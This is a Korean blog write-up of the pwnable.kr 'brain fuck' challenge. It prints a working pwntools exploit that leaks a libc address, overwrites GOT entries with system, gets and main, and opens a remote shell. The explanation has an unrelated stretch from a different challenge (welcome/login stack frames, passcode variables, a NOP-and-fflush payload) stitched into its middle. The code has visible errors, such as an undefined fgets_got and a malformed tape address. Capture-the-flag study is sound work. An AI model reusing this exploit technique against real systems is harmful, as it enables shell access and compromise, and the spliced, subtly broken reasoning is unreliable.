[Rookiss]brain fuck

🌇│System_Study/🪙│Pwnable.kr

[Rookiss]brain fuck

Jastes 2022. 11. 20. 23:39

brain fuck_WriteUp

보시면.. 내가 C로 개발한 멍청한 애뮬레이션 프로그램을 만들었어요..
[] 명령이 아직 구현하진 않았지만 나머지 기능은 정상적으로 작동하는 듯?
버그를 찾아서 셸을 얻어보아요.. 라고 하네요(지가 만든거를?)

파일을 받아서 열어보니까.. 실행파일이고 리버싱 할 부분이 너무 많아서 IDA 사용!

참고로 저는 리버싱 늅늅이라서 드럽게 못하거든요 그래서 길어지면.. 흐규 ㅠ

위 코드를 살펴보면 우리 드림이 문제랑 비슷하네요 친숙해 파일 불러오고
반복문에서 do_brainfuck을 진행하는데 나머지는 형식적인 내용이고 이 부분이 핵심!

보시면 포인터의 위치 가감 부분을 통해 흐름을 제어하는 것이구나..
또한 . 을 통해 해당 주소의 있는 값을 출력하는거구나(말을 약간 해깔리게.. 적었네)
그럼 어떻게 보호기법을 보며 어떤 우회기법을 사용할지 생각해봅시다.

위에 보시면 외부 명령어 불가(NX)이며, 카나리가 걸려있으므로써 상당히 난해합니다.
그러나 Partial RELRO와 PIE가 적용되어 있지 않기에 RTL이 가능합니다.

저희는 system 함수가 없기에 lib에서 받아와야하므로 GOT Overwrite를 하겠습니다.

Exploit design(Senario)

그럼 아까 "><"로 주소값을 p의 포인터 위치에서 옮길 수 있다는 점을 집중하며,

어렵게 생각하지 마시고 간단하게 main함수에서 시작되니까..

Senario

memset_got → gets() 함수로 덮습니다. 그리고 /bin/sh(bss 영역)을 넣습니다.
fgets_got → system() 함수로 덮습니다.
- 이 두 부분은 file을 불러들이는 부분으로 flag를 불러오는 것이겠죠?
putchar_got(해당 주소의 위치의 결과를 출력하니까) → main() 함수로 덮음
- 그래야 우리가 원하는 1번의 변조된 값으로 다시 반환되겠죠?

먼저 bss 영역을 확인해봅시다(/bin/sh)

b에서 보시면 됩니다 여기서 저희는 저희가 원하는 문자열을
삽입할것이기에 비어있는 부분을 찾아야합니다.

바로 tape가 있는 영역이 완전히 비어있는 모습입니다. 이 부분을 사용하면 되겠군요
그럼 나머지 아래 이미지로 memset_got부분과 fgets에서 그리고 putchar_got 부분을 확인합시다.

그리고 저희 bss영역에 사용될 tape 부분의 주소로써 나머지 got는 data

그럼 저희는 위 코드를 보고 메모리 구조가 대략 어떻게 되어있는지 추론이 가능합니다.

welcome func stack frame	esp	welcome func syscall
- name[100] -	ebp(ebp-0x70)	-
welcome sfp - ret	-	welcome func end
login func stack frame	esp	login func syscall
- passcode1, passcode2 -	ebp(ebp-0x10 & 0xc)	-
login func sfp - ret	-	login func end
main func stack frame	-	main func syscall
main sfp - ret	-	main func end

그리고 스택의 esp가 welcome(0x88)과 login(0x28)의 차이가 0x60(96)으로
차이가 0x4(4)만큼 차이가 생깁니다. 왜 저렇게 계산해서 저렇게 나왔냐.. 그럼 gdb로 확인하면

그럼 우리는 이 두 이미지를 통해 확인할 수 있습니다

Welcome stack frame

dummy(24byte)	esp(0xffffce10)
name buff(100byte)	start(0xffffce28)
dummy(12byte)	ebp(0xffffce98)

의 위치와 login도 확인을 하면..

ebp의 주소가 같다는 점을 알 수 있으며(당연히 바로 불러왔으니까.. 그럴 가능성이 높겠죠?)
또한 해당 esp가 welcome의 ebp의 주소에 포함되어 있습니다 상세하게 봅시다.

보시면 scanf에 passcode가 들어가는데 밑에 disass을 보시면 edx-0x10에 들어가네요
그러면 종합하여 메모리 구조를 구상해보면..

login stack frame

dummy(24byte)	esp(0xffffce70)
passcode1(4byte)	esp(0xffffce88)
passcode2(4byte)	start(0xffffce8c)
dummy(12byte)	ebp(0xffffce98)

위 코드가 매우 중요한 취약점의 코드입니다. 또한 메인함수에서 welcome과 login 함수가
실행되는데 메모리의 구조를 비교하면 name[95-99]까지 공유된다는 점
그리고 scanf에서 & 라는 인자를 안 넣으므로써 해당 주소의 값이 입력되는 점

그럼 if조건을 맞춰야겠죠(NX걸려있어요) 다른 공격기법도 될거 같은데 이렇게 해봅시다.

NOP(0x90)*0x60(96byte) + fflush_got(4byte) + system_addr(4byte)

로 구성할 수 있습니다. pwntool를 활용하여 payload를 작성해봅시다.

위에 이미지를 보시면 어떻게 주소를 찾았는지 확인 할 수 있습니다.

Exploit code

from pwn import*
context(arch='i386',os='linux')
context.log_level = 'debug' 

host = 'pwnable.kr'
port = 9001 

r = remote(host,port) 
libc = ELF('./libc.so')
elf = ELF('./bf')
tape = 0x0804a0a0f
gets_got = 0x0804A010
memset_got = 0x0804A02C
putchar_got = 0x0804A030 

payload = "<" * (tape - fgets_got) # go to fgets
payload += ".>" * 4   # print fgets addr
payload += "<" * 4    # go to fgets
payload += ",>" * 4   # Overwrite fgets -> system

payload +=  "<" * 4    # go to fgets 
payload += ">" * (memset_got - fgets_got) #go to memset
payload += ",>" * 4   # Overwrite gets
payload += "<" * 4    # go to memset 

payload += ">" * (putchar_got - memset_got) # go to putchar
payload += ",>" * 4   #Overwrite putchar -> main_addr
payload += "."      #run putchar() = main 

print('payload : '+payload) 

#r.recvline_startswith('type')
r.recvuntil(']\n')
r.sendline(payload) 

#recvn = Receive exactly N bytes
fgets_addr = r.recvn(4)[::-1].encode('hex')
log.info('fgets_addr = '+(fgets_addr)) 

libc_base = int(fgets_addr,16) - libc.symbols['fgets']
log.info('libc_addr = '+hex(libc_base)) 

system_addr = libc_base + libc.symbols['system']
log.info('system_addr = '+hex(system_addr)) 

gets_addr = libc_base + libc.symbols['gets']
log.info('gets_addr ='+hex(gets_addr)) 

main_addr = elf.symbols['main'] 

r.send(p32(system_addr))
r.send(p32(gets_addr))
r.send(p32(main_addr))
r.sendline('/bin/sh\x00') 

r.interactive()

코드의 구성은 앞에서 다 설명했으므로 핵심만 집어봅시다.
또한 파이썬 버전 이슈가 좀 있어서.. 상황은 길어서.. 하.. 보안하기 힘드네요

Ubuntu에서 Python 버전을 변경하는 방법

우분투를 설치하면 파이선2.7이 설치되어있습니다. 리눅스의 Alternatives를 이용하면 python 버전을 쉽게 변경하고 관리할 수 있습니다. 우분투에 파이썬2.7과 파이썬3.5 버전을 모두 설치하고, 특정

codechacha.com

[pwnable] Ubuntu 16.04에 Pwntools, Pwndbg 설치하기

VMware Workstation Pro에 Ubuntu 16.04 설치하기 Ubuntu 초기 기본 설정 ~$ sudo apt-get update ~$ sudo apt-get upgrade 명령어를 통해 최신 파일들로 업데이트 Ubuntu 16.04에 Pwntools 설치하기 apt-get install python2.7-dev python-p

haerinn.tistory.com

위에 자료를 보시고 파이썬 버전을 변경해주세요 ㅎ
아.. 그리고 저 위에 익스랑 아례 이미지가 다른 이윤 원래 작성해서 할라고 했는데.. 시간관계상
너무 안되서 이제.. 위에 코드로(젤 처음에 작성하고 설계하고 해본 코드) 실행했습니다.

또한 익스 구조 및 설계도 똑같고 이왕 보기 좋게 꾸미고
작성한 부분이 아까워서.. 사용하겠습니다

여기서 do_bf using func부분은 '<'ptr의 영어 약어 등으로 구성되어 해당 포인터 위치 변조 및 삽입
나머지는 취양차이며 부수적으로 필요한 주소와 형식을 잡았습니다.

해당 35번째 줄을 보시면 tape를 포함 사용되는 모든 함수의 got는 여기선 .bss영역에 위치하며,
여기서 tape가 상위 주소에 적재되어 있으므로 해당 형식으로 하였습니다.
나머지는 해당 주석을 보시면 되는 부분이기 때문에 다음으로 넘어간다면

받는 부분(저 부분에서 encoding 문제네 뭐내 버전 안 맞는다니 뭐니 진짜 화나서 쓰러질 뻔)
이전에 dreamhack의 시스템 로드맵 마지막 문제도 비슷한 문제로 힘들었는데
하.. 이런 문제는 너무 python3이시면 저처럼 하셔도 됩니다~~(이전엔 python2로 해야 되는 경우는 뭐냐??)~~

나머지 부분도 lb구하고 그것을 토대로 나머지 필요한 부분의 실제주소도 구한 모습입니다.